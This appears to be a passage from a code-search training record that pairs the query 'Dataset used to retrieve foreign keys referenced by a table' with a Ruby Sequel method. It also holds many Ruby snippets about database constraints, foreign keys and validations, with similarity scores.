{}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n sql << \"CHECK #{filter_expr(constraint[:check])}\"\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = String.new\n sql << \"CONSTRAINT #{quote_identifier(constraint[:name])} \" if constraint[:name] \n case constraint[:type]\n when :check\n check = constraint[:check]\n check = check.first if check.is_a?(Array) && check.length == 1\n check = filter_expr(check)\n check = \"(#{check})\" unless check[0..0] == '(' && check[-1..-1] == ')'\n sql << \"CHECK #{check}\"\n when :primary_key\n sql << \"#{primary_key_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << column_references_table_constraint_sql(constraint.merge(:deferrable=>nil))\n when :unique\n sql << \"#{unique_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n else\n raise Error, \"Invalid constraint type #{constraint[:type]}, should be :check, :primary_key, :foreign_key, or :unique\"\n end\n constraint_deferrable_sql_append(sql, constraint[:deferrable])\n sql\n end",
"def build_constraints\n Schema::Logical::Constraint.new\n end",
"def get_validate data\n data.values.flatten\n end",
"def constraints; end",
"def constraints; end",
"def constraints; end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def check_constraints\n case self.recordable\n when ExtractionsExtractionFormsProjectsSectionsQuestionRowColumnField\n case self.recordable.question_row_column_field.question_row_column.question_row_column_type.name\n when 'text'\n min_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_length).to_i\n max_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_length).to_i\n if self.persisted? && self.name.length > 0 && (self.name.length < min_length || self.name.length > max_length)\n errors.add(:length, \"must be between #{ min_length.to_s } and #{ max_length.to_s }\")\n end\n when 'numeric'\n # First check that we aren't trying to validate any of the ~, <, >, ≤, ≥ special characters.\n if self.recordable.question_row_column_field.question_row_column.question_row_column_fields.second == self.recordable.question_row_column_field\n unless (self.name =~ /\\A[-+]?[0-9]*\\.?[0-9]+\\z/) || self.name != ''\n errors.add(:value, 'Must be numeric')\n end\n\n min_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_value).to_i\n max_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_value).to_i\n if self.persisted? && (self.name.to_i < min_value || self.name.to_i > max_value)\n errors.add(:value, \"must be numeric and between #{ min_value.to_s } and #{ max_value.to_s }\")\n end\n end\n end\n end\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def check_constraint(*partition_key_values)\n return collect_first(*partition_key_values, &:check_constraint)\n end",
"def constraint_params\n params.require(:constraint).permit(:title, :decision_id)\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map{|x| x.inspect}.join(', ')}\"\n end\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def hdf_descriptions(config_rule)\n [\n {\n label: 'check',\n data: check_text(config_rule)\n },\n ]\n end",
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map(&:inspect).join(', ')}\"\n end\n when :foreign_key\n c.delete(:on_delete) if c[:on_delete] == :no_action\n c.delete(:on_update) if c[:on_update] == :no_action\n c.delete(:deferrable) unless c[:deferrable]\n cols = c.delete(:columns)\n table = c.delete(:table)\n \"#{type} #{cols.inspect}, #{table.inspect}#{opts_inspect(c)}\"\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def add_check_constraint(table, name, check)\n current_instructions << Instructions::AddCheckConstraint.new(\n table: table,\n name: name,\n check: check,\n )\n end",
"def validate\n refs_errors = validate_references\n labels_errors = datasets.reduce([]) { |a, e| a.concat(e.validate) }\n refs_errors.concat(labels_errors)\n end",
"def check_constraint_params\n\t\tparams.require(:constraint).permit(:travel_mean, :subject, :operator, :value)\n\tend",
"def supports_check_constraints?\n false\n end",
"def contraints(p_module_object)\n\t\tconstraints = []\n\t\tmin = self.find_property('MIN')\n\t\tif ! min.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Min.new(p_module_object, min.value)\n\t\tend\n\t\tmax = self.find_property('MAX')\n\t\tif !max.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Max.new(p_module_object, max.value)\n\t\tend\n\t\tconstraints \n\n\tend",
"def confidence_avail_db\n\n case hgt_type\n when :regular then [1]\n when :all then [1,0]\n else raise AssertError.new \"\"\n end\n\n end",
"def validated_data\n @schema.validate(@data)\n end",
"def bulk_check_sql\n @bulk_check_sql.nil? ? \"SELECT * FROM #{self.table.entity.sql.qualified_table_name} WHERE NOT (#{self.constraint_sql})\" : @bulk_check_sql\n end",
"def bulk_check_sql\n @bulk_check_sql.nil? ? \"SELECT * FROM #{self.table.entity.sql.qualified_table_name} WHERE NOT (#{self.constraint_sql})\" : @bulk_check_sql\n end",
"def validate_constraint(name)\n @operations << {:op => :validate_constraint, :name => name}\n end",
"def descriptions\n\t\treturn self.constraints.each_with_object({}) do |(field,constraint), hash|\n\t\t\thash[ field ] = constraint.description\n\t\tend\n\tend",
"def data_to_ruleset \n\n\t\ttemp_array = []\n\t\trule_name = self.fctr_code.blank? ? (\"rule_\" + self.id.to_s) : self.fctr_code + \": \"\n\n\t\tif not self.where_country.blank?\n\t\t\ttemp_array << (\"c_where_country = \" + self.where_country.subfctr_name)\n\t\tend\n\n\t\tif not self.where_zone.blank?\n\t\t\ttemp_array << (\"c_where_zone = \" + self.where_zone.subfctr_name)\n\t\tend\n\n\t\tif not self.where_network.blank?\n\t\t\ttemp_array << (\"c_where_network = \" + self.where_network.subfctr_name)\n\t\tend\n\n\t\tif not self.where_custom.blank?\n\t\t\ttemp_array << (\"c_where_custom = \" + self.where_custom.subfctr_name)\n\t\tend\n\n\t\tif temp_array.size > 0\n\t\t\treturn rule_name + temp_array.join(\", \")\n\t\telse\n\t\t\treturn \"\"\n\t\tend\n\tend",
"def lint_dataset_predicate\n return if gateway_instance.respond_to? :dataset?\n\n complain \"#{gateway_instance} must respond to dataset?\"\n end",
"def propertiesForConstraint\n\tend",
"def validate\n super\n rescue Sudoku::Constraint::ConstraintError => e\n raise ConstraintError, e.message + \" in a column\"\n end",
"def condition_values\n @rule_details.conditions[0].values\n end",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def required_data() [] end",
"def check_budget\n checks = []\n\n # Internal consistency\n checks << check_equal(\"Transferencias internas ingresos = gastos\", \n beautify(@income[:consolidado][:transferencias]),\n beautify(@expenses[:consolidado][:transferencias]) )\n\n # Expenses\n checks.concat check_expenses('R_6_2_801_1_3', \"Estado\", :estado)\n checks.concat check_expenses('R_6_2_802_1_3', \"Organismos Autónomos\", :ooaa)\n checks.concat check_expenses('R_6_2_803_1_3', \"Agencias estatales\", :agencias)\n checks.concat check_expenses('R_6_2_804_1_3', \"Otros organismos\", :otros)\n checks.concat check_expenses('R_6_2_805_1_3', \"Seguridad Social\", :seg_social)\n\n # Income\n checks.concat check_income('R_6_1_101_1_5_1', \"Estado\", :estado)\n checks.concat check_income('R_6_1_102_1_4_1', \"Organismos Autónomos\", :ooaa)\n checks.concat check_income('R_6_1_103_1_4_1', \"Agencias estatales\", :agencias)\n checks.concat check_income('R_6_1_104_1_4_1', \"Otros organismos\", :otros)\n checks.concat check_income('R_6_1_105_1_5_1', \"Seguridad Social\", :seg_social)\n\n # Return results\n checks.join(\"\\n\")\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def constraints\n super\n end",
"def check_params\n params.require(:check).permit(:category, :name, :condition_query, :condition_operator, :condition_aggregator, :condition_value, :severity, :interval, :is_locked, :team_id, :datasource_id, :documentation_url, :index)\n end",
"def to_dump(opts={})\n dump = \"\"\n dump << \"add_column_check_constraint #{table_name.to_s}, #{column_name.to_s}\" unless opts[:inline]\n dump << \", check: #{check.inspect}\"\n dump << \"\\n\"\n dump\n end",
"def constraints(_)\n nil\n end",
"def saint_saens; end",
"def constraint_by_name(name)\n self[name]\n end",
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def odk_constraint\n exps = []\n exps << \". #{minstrictly ? '>' : '>='} #{casted_minimum}\" if minimum\n exps << \". #{maxstrictly ? '<' : '<='} #{casted_maximum}\" if maximum\n exps.empty? ? nil : \"(\" + exps.join(\" and \") + \")\"\n end",
"def valid_validation_parameter\n %i[\n validate\n criteria\n value\n source\n minimum\n maximum\n ignore_blank\n dropdown\n show_input\n input_title\n input_message\n show_error\n error_title\n error_message\n error_type\n other_cells\n ]\n end",
"def read_residual_mandatory_constraints\n trace :orm, \"Processing non-absorbed mandatory constraints\" do\n @mandatory_constraints_by_rs.each { |role_sequence, x|\n id = x['id']\n # Create a simply-mandatory PresenceConstraint for each mandatory constraint\n name = x[\"Name\"] || ''\n name = nil if name.size == 0\n #puts \"Residual Mandatory #{name}: #{role_sequence.to_s}\"\n\n if (players = role_sequence.all_role_ref.map{|rr| rr.role.object_type}).uniq.size > 1\n join_over, = *ActiveFacts::Metamodel.plays_over(role_sequence.all_role_ref.map{|rr| rr.role}, :proximate)\n raise \"Mandatory join constraint #{name} has incompatible players #{players.map{|o| o.name}.inspect}\" unless join_over\n if players.detect{|p| p != join_over}\n trace :query, \"subtyping step simple mandatory constraint #{name} over #{join_over.name}\"\n players.each_with_index do |player, i|\n next if player != join_over\n # REVISIT: We don't need to make a subtyping step here (from join_over to player)\n end\n end\n end\n\n pc = @constellation.PresenceConstraint(id_of(x))\n pc.vocabulary = @vocabulary\n pc.name = name\n pc.role_sequence = role_sequence\n pc.is_mandatory = true\n pc.min_frequency = 1 \n pc.max_frequency = nil\n pc.is_preferred_identifier = false\n\n (@constraints_by_rs[role_sequence] ||= []) << pc\n @by_id[id] = pc\n }\n end\n end",
"def dataset_properties_required\n @dataset_properties_required ||= %i[\n creator\n title\n publisher\n date_published\n resource_type_general\n resource_type\n ]\n end",
"def check_parameter_constraints\n check_constraints_for_a if (@repository.parameters[:all])\n check_constraints_for_c if (@repository.parameters[:coord])\n check_constraints_for_d if (@repository.parameters[:delta])\n check_constraints_for_r if (@repository.parameters[:range])\n\n # check mandatory parameter combination\n check_parameter_occurrence\n \n # check mandatory file parameter\n check_mandatory_parameter(:file)\n end",
"def validate_data\n inputs = Set.new(node.in_slots.map(&:carrier))\n effs = Set.new(dependencies)\n\n unless inputs.subset?(effs)\n # One or more efficiencies are missing.\n errors.add(:base, error_msg(:efficiencies, inputs, effs))\n end\n\n unless effs.subset?(inputs)\n # One or more input shares are missing.\n errors.add(:base, error_msg(:inputs, effs, inputs))\n end\n end",
"def constraint_listeners\n @constraint_listeners\n end",
"def find_dataset_errors(dataset:)\n errs = []\n return errs unless dataset.present? && !dataset.valid?\n\n errs << dataset.errors.full_messages\n errs = errs.flatten.uniq\n errs.any? ? [\"Dataset : #{errs}\"] : []\n end",
"def constraint\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 8 )\n return_value = ConstraintReturnValue.new\n\n # $rule.start = the first token seen before matching\n return_value.start = @input.look\n\n root_0 = nil\n string_literal31 = nil\n\n tree_for_string_literal31 = nil\n\n begin\n root_0 = @adaptor.create_flat_list\n\n\n # at line 41:5: 'not null'\n string_literal31 = match( NOT_NULL, TOKENS_FOLLOWING_NOT_NULL_IN_constraint_239 )\n\n tree_for_string_literal31 = @adaptor.create_with_payload( string_literal31 )\n @adaptor.add_child( root_0, tree_for_string_literal31 )\n\n # - - - - - - - rule clean up - - - - - - - -\n return_value.stop = @input.look( -1 )\n\n\n return_value.tree = @adaptor.rule_post_processing( root_0 )\n @adaptor.set_token_boundaries( return_value.tree, return_value.start, return_value.stop )\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n return_value.tree = @adaptor.create_error_node( @input, return_value.start, @input.look(-1), re )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 8 )\n\n end\n \n return return_value\n end",
"def check_required_fields(data)\r\n @field_names[1..-1].each do |f|\r\n raise(ArgumentError,\r\n 'A value for this field is required: %s' % f) if \\\r\n @field_requireds[@field_names.index(f)] and data[f].nil? \r\n end\r\n end",
"def odk_constraint\n exps = []\n exps << \". #{minstrictly ? '>' : '>='} #{minimum}\" if minimum\n exps << \". #{maxstrictly ? '<' : '<='} #{maximum}\" if maximum\n \"(\" + exps.join(\" and \") + \")\"\n end",
"def marshall_listed_constraints() \n idx = 0\n constraints_with_ids = []\n for constraint in session[:constraints]\n # record the original index in the constraints array, use this as an id\n constraints_with_ids << { :id => idx, :constraint => constraint } \n idx = idx + 1\n end\n\n return constraints_with_ids # at the moment, we are showing all constraints.\n end",
"def validate_check(check)\n validate_check_name(check)\n validate_check_execution(check)\n validate_check_source(check) if check[:source]\n validate_check_scheduling(check)\n validate_check_proxy_requests(check) if check[:proxy_requests]\n validate_check_handling(check)\n validate_check_ttl(check) if check[:ttl]\n validate_check_aggregate(check)\n validate_check_flap_detection(check)\n validate_check_hooks(check) if check[:hooks]\n validate_check_truncate_output(check)\n validate_check_subdue(check) if check[:subdue]\n end",
"def validate_references\n if datasets.count == 1\n []\n else\n x = datasets.reduce([]) { |a, e| e.anchor? ? a << [e.name, e.anchor[:name]] : a }\n refs = datasets.reduce([]) do |a, e|\n a.concat(e.references)\n end\n refs.reduce([]) do |a, e|\n x.include?([e[:dataset], e[:reference]]) ? a : a.concat([e])\n end\n end\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def all_constraint\n (\n Array(role_value_constraint) +\n all_role_ref.to_a.flat_map do |rr|\n rr.role_sequence.all_presence_constraint.to_a +\n rr.role_sequence.all_subset_constraint_as_superset_role_sequence +\n rr.role_sequence.all_subset_constraint_as_subset_role_sequence +\n rr.role_sequence.all_set_comparison_roles.map(&:set_comparison_constraint)\n end +\n all_ring_constraint.to_a +\n all_ring_constraint_as_other_role.to_a\n ).uniq\n end",
"def lint\n ret = []\n ret << :cve if self.cve.nil?\n ret << :osvdb if @osvdb.nil?\n ret << :cvss if self.cvss.nil? || self.cvss.empty? || self.cvss == \"not assigned\"\n ret << :severity if self.severity == \"unknown\"\n ret << :priority if self.priority == \"unknown\"\n\n ret\n end",
"def check_constraint_on_finalize?\n # Don't bother checking if sql_analysis is enabled as the `spCheckConstraints` will be invoked\n @check_constraint_on_finalize.nil? ? !self.table.entity.data_module.sql_analysis? : @check_constraint_on_finalize\n end",
"def check_constraint_on_finalize?\n # Don't bother checking if sql_analysis is enabled as the `spCheckConstraints` will be invoked\n @check_constraint_on_finalize.nil? ? !self.table.entity.data_module.sql_analysis? : @check_constraint_on_finalize\n end",
"def check_constraint_on_finalize?\n # Don't bother checking if sql_analysis is enabled as the `spCheckConstraints` will be invoked\n @check_constraint_on_finalize.nil? ? !self.table.entity.data_module.sql_analysis? : @check_constraint_on_finalize\n end",
"def requirements\n []\n end",
"def constraint_target\n target\n end",
"def get_design_checks\n\n design_checks = self.design_checks # DesignCheck.find(:all, :conditions => \"audit_id=#{self.id}\")\n \n self.checklist.each_check do |check|\n design_check = design_checks.detect { |dc| dc.check_id == check.id }\n check.design_check = design_check if design_check\n end\n \n end",
"def check_all_foreign_keys_valid!\n end",
"def to_constr\n @hash.map{|id, ty|\n Constraint.new(Type::TyVar[id], ty)\n }\n end",
"def all_constraints(table_filter=nil)\n constraints = tables.values.map(&:constraints).flatten\n constraints.delete_if{|c|!table_filter.include?(c.table.name)} if table_filter\n constraints\n end",
"def add_check(table_name, condition, options)\n name = options.fetch(:name) { raise 'add_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_column_name(name)}\n CHECK (#{condition})\n SQL\n end",
"def expected_columns; end",
"def to_constraint(arr)\n \"[#{arr[0]}, #{arr[1]}]\"\n end",
"def column_names\n\t\t@validated_gets.map{|f| f[:external]} + [\"usd_2009\", \"usd_current\", \"count\", \"min_year\", \"max_year\"]\n\tend",
"def validations\n []\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def constraint_to_a(name, constraint)\n op, vers = constraint.split(\" \")\n [name, vers, op]\n end",
"def required_checks(xml, checks)\n required_checks = [*checks].map { |c| Util.underscore(c).to_sym }\n xml.ChecksRequired do\n Constants::CHECKS.each do |check|\n included = required_checks.include?(Util.underscore(check).to_sym)\n xml.send(check, included ? \"yes\" : \"no\")\n end\n end\n end",
"def requirements; end",
"def requirements; end",
"def requirements; end",
"def requirements; end",
"def checks\r\n checks = []\r\n jobs.each do |job|\r\n checks << job.check_informations.first\r\n end\r\n checks = checks.flatten.compact\r\n end",
"def demand_array\n demands.collect do |demand|\n constraint = demand.locked_version || demand.version_constraint\n [demand.name, constraint]\n end\n end",
"def index\n @constraints = Constraint.all\n end",
"def column\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 6 )\n return_value = ColumnReturnValue.new\n\n # $rule.start = the first token seen before matching\n return_value.start = @input.look\n\n root_0 = nil\n __ID22__ = nil\n datatype23 = nil\n constraint24 = nil\n\n tree_for_ID22 = nil\n\n begin\n root_0 = @adaptor.create_flat_list\n\n\n # at line 35:5: ID datatype ( constraint )*\n __ID22__ = match( ID, TOKENS_FOLLOWING_ID_IN_column_196 )\n\n tree_for_ID22 = @adaptor.create_with_payload( __ID22__ )\n root_0 = @adaptor.become_root( tree_for_ID22, root_0 )\n\n @state.following.push( TOKENS_FOLLOWING_datatype_IN_column_199 )\n datatype23 = datatype\n @state.following.pop\n @adaptor.add_child( root_0, datatype23.tree )\n # at line 35:18: ( constraint )*\n while true # decision 6\n alt_6 = 2\n look_6_0 = @input.peek( 1 )\n\n if ( look_6_0 == NOT_NULL )\n alt_6 = 1\n\n end\n case alt_6\n when 1\n # at line 35:18: constraint\n @state.following.push( TOKENS_FOLLOWING_constraint_IN_column_201 )\n constraint24 = constraint\n @state.following.pop\n @adaptor.add_child( root_0, constraint24.tree )\n\n else\n break # out of loop for decision 6\n end\n end # loop for decision 6\n # - - - - - - - rule clean up - - - - - - - -\n return_value.stop = @input.look( -1 )\n\n\n return_value.tree = @adaptor.rule_post_processing( root_0 )\n @adaptor.set_token_boundaries( return_value.tree, return_value.start, return_value.stop )\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n return_value.tree = @adaptor.create_error_node( @input, return_value.start, @input.look(-1), re )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 6 )\n\n end\n \n return return_value\n end",
"def set_validations\n # TODO: Move below this line to the partition class itself\n @keys.each do |key|\n case key.type\n when :continuous\n partition_class.validates_uniqueness_of(\"#{key.column}_begin\", :scope => @keys.remaining_columns(\"#{key.column}_begin\"))\n partition_class.validates_uniqueness_of(\"#{key.column}_end\", :scope => @keys.remaining_columns(\"#{key.column}_end\"))\n when :discrete\n partition_class.validates_uniqueness_of(key.column, :scope => @keys.remaining_columns(key.column))\n end\n end\n end",
"def check_data_validation\r\n if @tx_interest.text.to_f > 0 and \r\n @tx_interest.text.to_f < 0.1 and\r\n @tx_amount.text.to_i >= 1000 and\r\n @tx_years.text.to_i >= 1 then\r\n tf = true\r\n else\r\n tf = false\r\n end\r\n return tf\r\n end",
"def create_checklist\n self.checklist.each_check do |check|\n DesignCheck.add(self, check) if check.belongs_to?(self.design)\n end\n end",
"def dataset_need_primary_key?\n true\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def columns\n orig_dataset.columns\n end",
"def check_for_requirements; end",
"def attribute_constraints(mt_id = nil)\n PatternElement.where(:pattern_id => self.id, monitoring_task_id: [nil, mt_id], type: \"AttributeConstraint\")\n end",
"def conditions\n c = [DateCondition,SqlCondition,AnyCondition,IpRangeCondition,FilterCondition]\n return [] unless self.yaml_declaration\n y = YAML.parse(self.yaml_declaration)\n return [] unless y\n y.transform \n end",
"def to_s\n constraints.to_sentence\n end"
] |
[
"0.6155641",
"0.60944134",
"0.5996631",
"0.59153426",
"0.58677566",
"0.57724947",
"0.57413626",
"0.57413626",
"0.57413626",
"0.569063",
"0.5663217",
"0.5560472",
"0.5520541",
"0.5471246",
"0.5470642",
"0.54595786",
"0.54445577",
"0.54018646",
"0.5377396",
"0.5370092",
"0.5359885",
"0.5358358",
"0.5328339",
"0.5217813",
"0.51730186",
"0.5172916",
"0.5172916",
"0.5124813",
"0.51057416",
"0.5103544",
"0.50639737",
"0.5041395",
"0.5014041",
"0.49999535",
"0.49849275",
"0.49460497",
"0.49194357",
"0.4892625",
"0.48609218",
"0.48561966",
"0.48511145",
"0.48502496",
"0.48414615",
"0.4831207",
"0.48264015",
"0.48214692",
"0.48185122",
"0.48176077",
"0.47626162",
"0.47471645",
"0.47102425",
"0.47073776",
"0.46992496",
"0.46979013",
"0.4687194",
"0.46782422",
"0.46666813",
"0.46634394",
"0.46540147",
"0.46455425",
"0.46391317",
"0.46328416",
"0.46257684",
"0.4621453",
"0.46141347",
"0.46141347",
"0.46141347",
"0.4607217",
"0.45974234",
"0.45864815",
"0.45838338",
"0.45769262",
"0.4576863",
"0.45521998",
"0.4543986",
"0.45427915",
"0.45422795",
"0.45369127",
"0.4535537",
"0.4535537",
"0.45306906",
"0.452695",
"0.45234308",
"0.45234308",
"0.45234308",
"0.45234308",
"0.4513258",
"0.45108852",
"0.4505121",
"0.45020738",
"0.4492718",
"0.44913992",
"0.44847405",
"0.4483764",
"0.44759196",
"0.44740388",
"0.4473311",
"0.44715884",
"0.44642732",
"0.44591695"
] |
0.7300358
|
0
|
Dataset used to retrieve foreign keys referenced by a table
|
def _foreign_key_list_ds
@_foreign_key_list_ds ||= __foreign_key_list_ds(false)
end
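
# Hedged companion sketch: the same private builder is memoized elsewhere in
# these snippets with reverse=true to list keys that reference a table; shown
# here only to illustrate the forward/reverse pairing, not as new API.
def _reverse_foreign_key_list_ds
  @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)
end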
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
